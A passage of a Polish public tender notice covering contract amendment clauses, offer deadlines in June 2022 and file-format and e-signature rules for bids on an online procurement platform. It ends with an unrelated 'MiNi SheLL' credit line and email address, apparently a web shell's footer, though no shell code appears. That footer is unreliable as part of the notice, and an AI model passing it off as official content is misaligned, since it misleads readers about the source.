przedmiotu umowy wystąpią okoliczności powodujące, że niecelowe dla Zamawiającego byłoby wykonanie pełnego zakresu przedmiotu umowy; 2) zmiany sposobu wykonania przedmiotu umowy oraz terminów wykonania umowy lub poszczególnych czynności umowy w razie wystąpienia siły wyższej lub w związku ze zdarzeniami powstałymi z winy osób trzecich lub z powodu wystąpienia okoliczności, niezależnych od strony; 3) zmiany w przepisach ustawowych i aktach wykonawczych związanych z przedmiotem umowy, które nastąpiły po dniu zawarcia umowy; 4) zmiana umowy, co do jej zakresu przedmiotowego, terminu wykonania, wynagrodzenia, praw i obowiązków stron będąca konsekwencją zmian co do realizacji programu, 5) zmiany terminu wykonania umowy, czasu trwania umowy jej zakresu przedmiotowego, wynagrodzenia wraz z innymi konsekwencjami zmiany z uwagi na wystąpienie zdarzeń zewnętrznych, niezależnych od stron umowy, w tym z uwagi na wystąpienie stanu zagrożenia epidemiologicznego lub stanu epidemii zgodnie z obowiązującymi przepisami prawa, braku dostępności części i materiałów niezbędnych do wykonania przedmiotu umowy, wydłużenia cykli produkcyjnych dla części i materiałów niezbędnych do wykonania przedmiotu umowy; 6) w razie złożenia wniosku o upadłość albo likwidację Wykonawcy;<br/> 7) gdy wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony, a nie prowadzi ona do zmiany istoty przedmiotu umowy. 3. W przypadku zmniejszenia zakresu rzeczowego przedmiotu umowy Wykonawca otrzyma do realizacji 30% maksymalnej łącznej ilości godzin usług asystenta określonej w formularzu ofertowym stanowiącym załącznik nr 3 do Specyfikacji Warunków Zamówienia. 4. W celu dokonania zmiany zapisów umowy wnioskowanych przez którąkolwiek ze stron Strona wnioskująca zobowiązana jest pisemnie wystąpić z propozycją zmiany warunków Umowy w zakresie zmian, o których mowa w ust. 2, wraz z ich uzasadnieniem. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na platformie zakupowej https://platformazakupowa.pl/pn/wlodawa – rozdział 11swz.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-14 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Cd. sekcji III pkt 3.6.) ogłoszenia. Informacje dodatkowe dot. komunikacji elektronicznej w postępowaniu: Wykonawca, za pośrednictwem platformazakupowa.pl może przed upływem terminu do składania ofert zmienić lub wycofać ofertę. Sposób dokonywania zmiany lub wycofania oferty zamieszczono w instrukcji zamieszczonej na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje. Po wypełnieniu Formularza składania oferty lub wniosku i dołączeniu wszystkich wymaganych załączników należy kliknąć przycisk „Przejdź do podsumowania”. Za datę złożenia oferty przyjmuje się datę jej przekazania w systemie (platformie) w drugim kroku składania oferty poprzez kliknięcie przycisku „Złóż ofertę” i wyświetleniu się komunikatu, że oferta została zaszyfrowana i złożona. W postępowaniu o udzielenie zamówienia<br/>komunikacja pomiędzy Zamawiającym a Wykonawcami w zakresie<br/>składania dokumentów, oświadczeń, wniosków (innych niż oferty i oświadczenia wskazane w pkt 8.1. SWZ, które mogą być przekazywane jedynie w sposób wskazany w pkt 11.14 SWZ) odbywa się elektronicznie za pośrednictwem: platformazakupowa.pl i formularzy „Wyślij wiadomość do zamawiającego”. Informację dodatkowe - rekomendacje:<br/>1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf; 2) w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: a).zip i b) .7Z; 3) wśród formatów powszechnych a niewystępujących w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452), występują: .rar .gif .bmp .numbers .pages; dokumenty złożone w takich plikach zostaną uznane za<br/>złożone nieskutecznie; 4) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi<br/>maksymalnie 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi maksymalnie 5MB; 5) ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca, w<br/>miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES; 6) pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES.<br/>Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym; 7) Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.<br/>Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików; 8) Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania plików oferty; 9) Zaleca się, aby komunikacja z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza „Wyślij wiadomość do zamawiającego”, nie za pośrednictwem adresu email; 10) ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków; 11)zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1; 12) jeśli Wykonawca pakuje dokumenty np. w plik ZIP zalecane jest wcześniejsze podpisanie każdego ze skompresowanych plików; 13) Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu;<br/>14) Zamawiający zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików, co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.<br/>Dot. pkt 4.2.10) ogłoszenia: 6 miesięcy ale nie dłużej niż do dnia 20.12.22 r

Creat By MiNi SheLL
Email: jattceo@gmail.com